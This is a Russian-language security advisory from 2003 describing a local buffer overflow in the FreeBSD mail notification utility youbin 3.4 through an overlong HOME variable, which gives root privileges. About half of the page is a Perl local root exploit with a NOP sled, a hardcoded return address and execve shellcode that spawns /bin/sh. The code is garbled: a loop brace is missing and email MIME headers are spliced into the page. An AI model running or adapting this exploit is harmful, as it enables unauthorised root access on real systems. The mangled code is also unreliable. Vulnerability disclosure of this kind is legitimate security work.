Переполнение буфера в переменной HOME в youbin
| Дата публикации: | 12.05.2003 |
| Всего просмотров: | 985 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость обнаружена в утилите 'youbin'. Локальный пользователь может выполнить произвольный код с root привилегиями.
Локальный пользователь может присвоить переменной HOME чрезмерно длинное, специально обработанное значение, чтобы вызвать переполнение буфера и выполнить произвольный код на системе с root привилегиями. Пример:
#!/usr/bin/perl
# DSR-youbin.pl - kokaninATdtors.net vs. /usr/ports/mail/youbin
# offset, retaddr and shellcode is for my FreeBSD 4.7-RELEASE, YMMV
# shellcode by eSDee, he's cool
# youbin-3.4 Mail arrival notification service package
$len = 512;
$ret = pack("l",0xbfbffd68);
$nop = "\x90";
$shellcode = "\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68".
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
"\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
for ($i = 0; $i < $len - length($shellcode); $i++) {
$buffer .= $nop;
$buffer .= $shellcode;
local($ENV{'EGG'}) = $buffer;
local($ENV{'HOME'}) = $ret x 259;
system("youbin");
------=_NextPart_000_004D_01C313DA.0BD3E420
Content-Type: text/plain;
name="DSR-youbin.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="DSR-youbin.txt"
Уязвимость обнаружена в youbin 3.4
|
| Ссылки: | youbin local root exploit + advisory |